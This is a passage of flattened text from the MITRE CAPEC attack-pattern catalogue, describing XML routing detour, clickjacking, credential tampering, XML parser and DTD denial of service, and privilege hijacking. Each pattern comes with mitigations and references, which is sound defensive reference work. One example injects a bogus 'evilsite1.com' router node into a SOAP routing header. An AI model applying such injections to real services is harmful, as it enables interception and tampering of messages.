example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a 'end user client' but rather the starting point of the XML transaction). Example SOAP message with routing information in header: &lt;S:Envelope&gt; &lt;S:Header&gt; &lt;m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"&gt; &lt;m:action&gt;http://example1.com/&lt;/m:action&gt; &lt;m:to&gt;http://example4.com/router&lt;/m:to&gt; &lt;m:id&gt;uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f&lt;/m:id&gt; &lt;m:fwd&gt; &lt;m:via&gt;http://example2.com/router&lt;/m:via&gt; &lt;/m:fwd&gt; &lt;m:rev /&gt; &lt;/m:path&gt; &lt;/S:Header&gt; &lt;S:Body&gt; ... &lt;/S:Body&gt; &lt;/S:Envelope&gt; Add an additional node (example3.com/router) to the XML path in a WS-Referral message &lt;r:ref xmlns:r="http://schemas.example.com/referral"&gt; &lt;r:for&gt; &lt;r:prefix&gt;http://example2.com/router&lt;/r:prefix&gt; &lt;/r:for&gt; &lt;r:if/&gt; &lt;r:go&gt; &lt;r:via&gt;http://example3.com/router&lt;/r:via&gt; &lt;/r:go&gt; &lt;/r:ref&gt; Resulting in the following SOAP Header: &lt;S:Envelope&gt; &lt;S:Header&gt; &lt;m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"&gt; &lt;m:action&gt;http://example1.com/&lt;/m:action&gt; &lt;m:to&gt;http://example4.com/router&lt;/m:to&gt; &lt;m:id&gt;uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f&lt;/m:id&gt; &lt;m:fwd&gt; &lt;m:via&gt;http://example2.com/router&lt;/m:via&gt; &lt;m:via&gt;http://example3.com/router&lt;/m:via&gt; &lt;/m:fwd&gt; &lt;m:rev /&gt; &lt;/m:path&gt; &lt;/S:Header&gt; &lt;S:Body&gt; ... &lt;/S:Body&gt; &lt;/S:Envelope&gt; In the following example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that he/she has targeted. Example of WS-Referral based WS-Routing injection of the bogus node route: &lt;r:ref xmlns:r="http://schemas.example.com/referral"&gt; &lt;r:for&gt; &lt;r:prefix&gt;http://example2.com/router&lt;/r:prefix&gt; &lt;/r:for&gt; &lt;r:if/&gt; &lt;r:go&gt; &lt;r:via&gt;http://evilsite1.com/router&lt;/r:via&gt; &lt;/r:go&gt; &lt;/r:ref&gt; Resulting XML Routing Detour attack: &lt;S:Envelope&gt; &lt;S:Header&gt; &lt;m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"&gt; &lt;m:action&gt;http://example_0.com/&lt;/m:action&gt; &lt;m:to&gt;http://example_4.com/router&lt;/m:to&gt; &lt;m:id&gt;uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f&lt;/m:id&gt; &lt;m:fwd&gt; &lt;m:via&gt;http://example2.com/router&lt;/m:via&gt; &lt;m:via&gt;http://evilesite1.com/router&lt;/m:via&gt; &lt;m:via&gt;http://example3.com/router&lt;/m:via&gt; &lt;/m:fwd&gt; &lt;m:rev /&gt; &lt;/m:path&gt; &lt;/S:Header&gt; &lt;S:Body&gt; ... &lt;/S:Body&gt; &lt;/S:Envelope&gt; Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents). Low To inject a bogus node in the XML routing table The attacker must be able to insert or compromise a system into the processing path for the transaction. Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication. Implementation: Use SSL for connections between all parties with mutual authentication. Integrity Modify application data Confidentiality Read application data Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism The routing table of the XML Header The bogus routing node in the routing table of XML header The route between the XML message sender and receiver. Information Leakage 441 Targeted 610 Secondary 1000 Attack Pattern ChildOf 94 http://capec.mitre.org/data/definitions/94.html 333 Category ChildOf 377 http://capec.mitre.org/data/definitions/365.html Exploitation High Medium Low Client-Server All All WASC Threat Classification 2.0 WASC-32 - Routing Detour The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/w/page/13246956/Routing-Detour Andre Yee Threat Protection in a Service Oriented World NFR Security http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf Pete Lindstrom Attacking & Defending Web Services SPiRE Security 2002 http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack. Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side. High High Spoofing Protocol Manipulation Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information. Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements. Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information. Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on. Medium The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars Ability to communicate synchronously or asynchronously with server Design: Ensure that client process and/or message is authenticated so that anonymous communications and/or messages are not accepted by the system. Design: Do not rely on client validation or encoding for security purposes. Design: Utilize digital signatures to increase authentication assurance. Design: Utilize two factor authentication to increase authentication assurance. Implementation: Perform input validation for all remote content. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Read application data 290 Targeted 287 Targeted 20 Secondary 200 Secondary 693 Secondary 1000 Category ChildOf 232 Penetration High High Low Client-Server n-Tier All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.22.1][REF-2] Cigital, Inc 2007-01-01 [R.22.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites, Examples-Instances An attacker takes advantage of weaknesses in the protocol by which a client and server are communicating to perform unexpected actions. Communication protocols are necessary to transfer messages between client and server applications. Moreover, different protocols may be used for different types of interactions. For example, an authentication protocol might be used to establish the identities of the server and client while a separate messaging protocol might be used to exchange data. If there is a weakness in a protocol used by the client and server, an attacker might take advantage of this to perform various types of attacks. For example, if the attacker is able to manipulate an authentication protocol, the attacker may be able spoof other clients or servers. If the attacker is able to manipulate a messaging protocol, the may be able to read sensitive information or modify message contents. This attack is often made easier by the fact that many clients and servers support multiple protocols to perform similar roles. For example, a server might support several different authentication protocols in order to support a wide range of clients, including legacy clients. Some of the older protocols may have vulnerabilities that allow an attacker to manipulate client-server interactions. The client and/or server must utilize a protocol that has a weakness allowing attacker manipulation of the interaction. Medium The attacker must be able to identify the weakness in the utilized protocol and exploit it. This may require a sniffing tool as well as packet creation abilities. The attacker will be aided if they can force the client and/or server to utilize a specific protocol known to contain exploitable weaknesses. 757 Secondary 1000 Attack Pattern ChildOf 151 1000 Attack Pattern ChildOf 22 1000 Attack Pattern ChildOf 272 1000 Attack Pattern ChildOf 151 333 Category HasMember 376 In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system. While being logged in to some target system, the victim visits the attackers' malicious site which displays a UI that the victim wishes to interact with. In reality, the iFrame overlay page has a transparent layer above the visible UI with action controls that the attacker wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the attacker may have just tricked the victim into executing some potentially privileged (and most undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks he or she is clicking on versus what he or she is actually clicking on. Craft an iFrame Overlay page The attacker crafts a malicious iFrame overlay page. The attacker leverages iFrame overlay capabilities to craft a malicious iFrame overlay page. env-Web Overlay capabilities are enabled in the browser. env-Web The target website implements protection against iFrame Overlay (frame busting). env-Web A page is created that performs unseen actions when the user interacts with the visible UI. Disable overlay functionality in the browser. This can have obvious impact on the usability of the browser with some sites and web applications. Implement frame busting protection in JavaScript in the application. The client-side code detects if a parent frame exist, if so, an iFrame overlay attack might be attempted. Attacker tricks victim to load the iFrame overlay page Attacker utilizes some form of temptation, misdirection or coercion to trick the victim to loading and interacting with the iFrame overlay page in a way that increases the chances that the victim will visit the malicious page. Trick the victim to the malicious site by sending the victim an e-mail with a URL to the site. env-Web Trick the victim to the malicious site by manipulating URLs on a site trusted by the victim. env-Web Trick the victim to the malicious site through a cross-site scripting attack. env-Web The victim loads the iFrame overlay page. Disable overlay functionality in the browser. This can have obvious impact on the usability of the browser with some sites and web applications. Trick victim into interacting with the iFrame overlay page in the desired manner The attacker tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege. Hide action controls over very commonly used functionality. env-Web Hide action controls over very psychologically tempting content. env-Web The victim is communicating with the target application via a web based UI and not a thick client. The victim's browser security policies allow iFrames. The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser). The victim has an active session with the target system. The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system. High Medium Spoofing Social Engineering The following example is a real-world iFrame overlay attack [2]. In this attack, the malicious page embeds Twitter.com on a transparent IFRAME. The status-message field is initialized with the URL of the malicious page itself. To provoke the click, which is necessary to publish the entry, the malicious page displays a button labeled "Don't Click." This button is aligned with the invisible "Update" button of Twitter. Once the user performs the click, the status message (i.e., a link to the malicious page itself) is posted to his/ her Twitter profile. High Crafting the proper malicious site and luring the victim to this site is not a trivial task. No special resource required. Configuration: Disable iFrames in the Web browser. Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks. Operation: If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames. Integrity Modify application data Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism 1000 Attack Pattern ChildOf 103 http://capec.mitre.org/data/definitions/103.html Exploitation High High Low Client-Server n-Tier SOA All All Michal Zalewski Browser Security Handbook Google Inc. 2008 http://code.google.com/p/browsersec/wiki/Main M. Mahemoff Explaining the "Don't Click" Clickjacking Tweetbomb Software As She's Developed February 12, 2009 http://softwareas.com/explaining-the-dont-click-clickjacking-tweetbomb Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary, Examples-Instances An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server. For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service. The targeted application must use session credentials to identify legitimate users. Medium An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential. CVE-2005-2252 PhpAuction 2.5 allows remote attackers to bypass authentication and gain privileges as another user by setting the PHPAUCTION_RM_ID cookie to the user ID. 1000 Attack Pattern ChildOf 196 CAPEC Content Team MITRE 2014-02-06 Updated Resources_Required An attacker engages a specific resource being offered by the target, continually performing actions or abusing algorithmic flaws to keep the resource engaged as long as possible or repeatedly engaging the service with requests, resulting in denying access to the resource to legitimate users. The attacker's primary goal is not to crash or flood the target, only to deny legitimate access. A resource will typically perform some action for legitimate users within a specific timeframe, and programmatically this may be adjusted by the target's administrator or hard-coded by the resource's developer, possibly both. Additionally there may be timing issues with a resource processing certain types of requests, with these requests normally being completed within a certain timeframe, uncommon requests taking a longer amount of time to complete, or complex requests that are set to time out out if not completed within a longer timeframe. It is also possible that unexpected or unanticipated input may cause a resource to be engaged much longer than normal, and an attacker could maliciously construct requests to a resource that significantly impacts the resource. By carefully crafting a series of repeated requests that engage a resource to take advantage of any of these situations or to simply keep the target engaged with what is seemingly legitimate requests, this can cause the resource to be severely impacted, and either limiting or completely denying access to the resource for legitimate users. The degree to which the attack is successful depends upon the attackers' ability to sustain resource requests over time with a volume that exceeds the normal usage by legitimate users, and other mitigating circumstances such as the target's ability to shift load or acquired additional resources to deal with the depletion. Other factors might include that each resource requires a unique login, local unprivileged access is constrained by system settings disallowing simultaneous engagements of the resource, or the resource's access is constrained to one access per IP address; the attacker would have to increase resources either by launching multiple sessions manually or programmatically to counter such defenses and limitations. When successful this attack prevents legitimate users from accessing the resource. This attack differs from a flooding attack as it is not entirely dependent upon large volumes of requests, and it differs from resource depletion through leaks or allocations which tend to exploit the surrounding environment needed for the resource to function. The key factor in a resource depletion denial of service attack is repeated sustained requests the attacker can make over a given period of time, with emphasis on requests that take longer to process than usual. The attack is more likely to succeed if the number of attacker requests are greater than legitimate user requests or if the attacker requests collectively take more time to complete than legitimate user requests within the same time frame, or both. Any target that services requests is vulnerable to this attack on some level. A script or program capable of generating more requests for a specific resource than the target can handle, continually engaging the the target to maintain exclusive usage of a specific resource, or a network or cluster of objects all capable of making simultaneous requests. 770 Targeted 1000 Category ChildOf 119 MITRE Content Team MITRE 2013-06-21 Updated Attack_Prerequisite Resources_Required and Summary CAPEC Content Team MITRE 2013-12-18 Updated Description Summary, Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker utilizes a SOAP message to send the target a crafted DTD which consumes excessive resources when parsed on the end system resulting in resource depletion. DTDs are used to describe how XML documents are processed. Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion. In this attack, the XML parser is part of a service that processes SOAP messages. The target must be running a SOAP client that contains vulnerabilities making it susceptible to malformed DTDs. Medium The attacker must be able to craft custom DTDs and attach them to SOAP messages. Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in resource depletion. Implementation: Disallow the inclusion of DTDs in SOAP messages. 770 Targeted 400 Targeted 100 Targeted 1000 Attack Pattern ChildOf 130 1000 Attack Pattern ChildOf 197 Ryan Naraine DoS Flaw in SOAP DTD Parameter InternetNews.com ITBusiness Edge, Quinstreet Inc. December 15, 2003 http://www.internetnews.com/dev-news/article.php/3289191 770 Targeted 1000 Attack Pattern ChildOf 82 333 Category HasMember 374 An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus. The target software must consume files. The attacker must have access to modify files that the target software will consume. Very High High Injection API Abuse PHP is a very popular web server. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the attacker can directly access and execute them through a browser. This vulnerability allows remote attackers to execute arbitrary code on the system, and can result in the attacker being able to erase intrusion evidence from system and application logs. [R.23.2] Medium Design: Enforce principle of least privilege Design: Validate all input for content including files. Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example) Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution. Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host. Implementation: Virus scanning on host Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Payload delivered through standard communication protocols. Command(s) executed directly on host filesystem Client machine and client network Enables attacker to execute server side code with any commands that the program owner has privileges to. 77 Targeted 23 Targeted 22 Targeted 713 Targeted 715 Targeted 1000 Attack Pattern ChildOf 241 1000 Attack Pattern ChildOf 242 1000 Attack Pattern ChildOf 165 Exploitation High High High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 The OWASP Guide Project File System The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/File_System [R.23.1][REF-2] Cigital, Inc 2007-01-01 [R.23.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Prerequisites Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Prerequisites Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Description Summary Applications often need to transform data in and out of the XML format by using an XML parser. It may be possible for an attacker to inject data that may have an adverse effect on the XML parser when it is being processed. By nesting XML data and causing this data to be continuously self-referential, an attacker can cause the XML parser to consume more resources while processing, causing excessive memory consumption and CPU utilization. An attacker's goal is to leverage parser failure to his or her advantage. In most cases this type of an attack will result in a denial of service due to an application becoming unstable, freezing, or crash. However it may be possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [R.230.1]. An attacker determines the input data stream that is being processed by an XML parser on the victim's side. An attacker crafts input data that may have an adverse effect on the operation of the XML parser when the data is parsed on the victim's system. An application uses an XML parser to perform transformation on user-controllable data. An application does not perform sufficient validation to ensure that user-controllable data is safe for an XML parser. High Medium Injection API Abuse Low Denial of service High Arbitrary code execution Bad data is passed to the XML parser, possibly making it crash. Carefully validate and sanitize all user-controllable data prior to passing it to the XML parser routine. Ensure that the resultant data is safe to pass to the XML parser. Perform validation on canonical data. Pick a robust implementation of an XML parser. Validate XML against a valid schema or DTD prior to parsing. Availability DoS: resource consumption (memory) Confidentiality Read memory Confidentiality Integrity Availability Execute unauthorized code or commands Confidentiality Access_Control Authorization Gain privileges / assume identity Application XML-compliant interface User-controllable XML code The XML parser code. 112 Targeted 20 Targeted 19 Targeted 674 Targeted 770 Targeted 1000 Attack Pattern ChildOf 99 1000 Attack Pattern ChildOf 82 Penetration Exploitation Medium High High Client-Server SOA All All All Shlomo, Yona XML Parser Attacks: A summary of ways to attack an XML Parser What is an XML Parser Attack? 2007 http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html CAPEC Content Team MITRE 2013-12-18 Updated Activation_Zone, Architectural_Paradigms, Attack_Motivation-Consequences, Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, CIA_Impact, Description, Description Summary, Frameworks, Indicators-Warnings_of_Attack, Injection_Vector, Languages, Methods_of_Attack, Payload, Platforms, Purposes, References, Related_Attack_Patterns, Related_Weaknesses, Solutions_and_Mitigations, Technical_Context, Type (Attack_Pattern -> Attack_Pattern), Typical_Likelihood_of_Exploit, Typical_Severity CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases Applications often need to transform data in and out of the XML format by using an XML parser. It may be possible for an attacker to inject data that may have an adverse effect on the XML parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the XML parser, an attacker can cause the XML parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An attacker's goal is to leverage parser failure to his or her advantage. In many cases this type of an attack will result in a denial of service due to an application becoming unstable, freezing, or crash. However it is possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [R.231.1]. An attacker determines the input data stream that is being processed by an XML parser on the victim's side. An attacker crafts input data that may have an adverse effect on the operation of the XML parser when the data is parsed on the victim's system. An application uses an XML parser to perform transformation on user-controllable data. An application does not perform sufficient validation to ensure that user-controllable data is safe for an XML parser. High Medium Injection API Abuse Low Denial of service High Arbitrary code execution Bad data is passed to the XML parser (possibly repeatedly), possibly making it crash or execute arbitrary code. Carefully validate and sanitize all user-controllable data prior to passing it to the XML parser routine. Ensure that the resultant data is safe to pass to the XML parser. Perform validation on canonical data. Pick a robust implementation of an XML parser. Validate XML against a valid schema or DTD prior to parsing. Availability DoS: resource consumption (memory) Confidentiality Read memory Confidentiality Integrity Availability Execute unauthorized code or commands Confidentiality Access_Control Authorization Gain privileges / assume identity Application XML-compliant interface User-controllable XML code The XML parser code. 112 Targeted 20 Targeted 19 Targeted 674 Targeted 770 Targeted 1000 Attack Pattern ChildOf 99 1000 Attack Pattern ChildOf 82 Penetration Exploitation Medium High High Client-Server SOA All All All Shlomo, Yona XML Parser Attacks: A summary of ways to attack an XML Parser What is an XML Parser Attack? 2007 http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html CAPEC Content Team MITRE 2013-12-18 Updated Activation_Zone, Architectural_Paradigms, Attack_Motivation-Consequences, Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, CIA_Impact, Description, Description Summary, Frameworks, Indicators-Warnings_of_Attack, Injection_Vector, Languages, Methods_of_Attack, Payload, Platforms, Purposes, References, Related_Attack_Patterns, Related_Weaknesses, Solutions_and_Mitigations, Technical_Context, Type (Attack_Pattern -> Attack_Pattern), Typical_Likelihood_of_Exploit, Typical_Severity CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases An attacker gains control of a process that is assigned elevated privileges in order to execute arbitrary code with those privileges. Some processes are assigned elevated privileges on an operating system, usually through association with a particular user, group, or role. If an attacker can hijack this process, they will be able to assume its level of privilege in order to execute their own code. Processes can be hijacked through improper handling of user input (for example, a buffer overflow or certain types of injection attacks) or by utilizing system utilities that support process control that have been inadequately secured. The targeted process or operating system must contain a bug that allows attackers to hijack the targeted process. Medium No special resources are required. 732 Targeted 648 Secondary CVE-2008-1363 VMware Workstation 6.0.x before 6.0.3 and 5.5.x before 5.5.6, VMware Player 2.0.x before 2.0.3 and 1.0.x before 1.0.6, VMware ACE 2.0.x before 2.0.1 and 1.0.x before 1.0.5, and VMware Server 1.0.x before 1.0.5 on Windows allow local users to gain privileges via an unspecified manipulation of a config.ini file located in an Application Data folder, which can be used for "hijacking the VMX process." CVE-2007-6705 The WebSphere MQ XA 5.3 before FP13 and 6.0.x before 6.0.2.1 client for Windows, when running in an MTS or a COM+ environment, grants the PROCESS_DUP_HANDLE privilege to the Everyone group upon connection to a queue manager, which allows local users to duplicate an arbitrary handle and possibly hijack an arbitrary process. 1000 Category ChildOf 232 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Description Summary 1000 Attack Pattern ChildOf 30 1000 Attack Pattern ChildOf 236 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns Attackers can sometimes hijack a privileged thread from the underlying system through synchronous (calling a privileged function that returns incorrectly) or asynchronous (callbacks, signal handlers, and similar) means. Having done so, the Attacker may not only likely access functionality the system's designer didn't intend for them, but they may also go undetected or deny other users essential service in a catastrophic (or insidiously subtle) way. Attacker determines the underlying system thread that is subject to user-control Attacker then provides input, perhaps by way of environment variables for the process in question, that affect the executing thread Upon successful hijacking, the attacker enjoys elevated privileges, and can possibly have the hijacked thread do his bidding The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users In order to feasibly execute this class of attacks, the attacker must have the ability to hijack a privileged thread. This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or providing malformed user-controllable input that causes the executing thread to fault and return to a higher privilege level or such. This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute. Very High Low Analysis Modification of Resources API Abuse Attacker targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread. The Attacker could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations. High Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread. The attacker needs to be able to latch onto a privileged thread. No special hardware or software tool-based resources are required. The Attacker does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the Attacker's malicious code. This is the case even if the attacker conducts the attack remotely. The attacker may attach a debugger to the executing process and observe the spawning and cleanup of threads, as well as the switches in privilege levels. The attacker can also observe the environment variables, if any, that affect executing threads and modify them in order to observe their effect on the execution. Application Architects must be careful to design callback, signal, and similar asynchronous constructs such that they shed excess privilege prior to handing control to user-written (thus untrusted) code. Application Architects must be careful to design privileged code blocks such that upon return (successful, failed, or unpredicted) that privilege is shed prior to leaving the block/scope. Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code 270 Secondary 1000 Attack Pattern ChildOf 30 1000 Category ChildOf 232 Only those constructs within the application that cannot execute without elevated privileges must be granted additional privileges. Often times, the entire function or the entire process is granted privileges that are usually not necessary. The callee must ensure that additional privileges are shed before returning to the caller. This avoids pinning the responsibility on an inadvertent caller who may not have a clue about the innards of the callee. Least Privilege Complete Mediation Minimize privileged code blocks Shed any privileges not required to execute at the earliest Treat the Entire Inherited Process Context as Unvalidated Input Exploitation High High Low All All All All CAPEC Content Team MITRE 2013-12-18 Updated Architectural_Paradigms, Attack_Motivation-Consequences, Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, CIA_Impact, Description, Description Summary, Examples-Instances, Frameworks, Languages, Methods_of_Attack, Platforms, Probing_Techniques, Purposes, Related_Attack_Patterns, Related_Guidelines, Related_Security_Principles, Related_Weaknesses, Relevant_Security_Requirements, Resources_Required, Solutions_and_Mitigations, Technical_Context, Type (Attack_Pattern -> Attack_Pattern), Typical_Likelihood_of_Exploit, Typical_Severity CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Relevant_Security_Requirements, Resources_Required The attacker may submit a malicious signed code from another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behave. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries. Probing The attacker probes the target application to see whether calling signed code from another language is allowed within a sandbox. The attacker probes the target application to see whether calling signed code from another language is allowed within a sandbox. env-All The target application allows calling signed code from another language within a sandbox. env-All The attacker knows that the target application is calling signed code from another language within a sandbox. Analysis The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox. The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox. env-All The standard library of the sandbox has some cross code security weaknesses. env-All The attacker gets a list of cross code security weaknesses in the standard libraries. Sanitize the code of the standard libraries to make sure there is no security weaknesses in them. If possible, use obfuscation and other techniques to prevent reverse engineering the libraries. Verify the exploitable security weaknesses The attacker tries to craft malicious signed code from another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase. The attacker tries to explore the security weaknesses by calling malicious signed code from another language allowed by the sandbox. env-Web The attacker identifies a list exploitable security 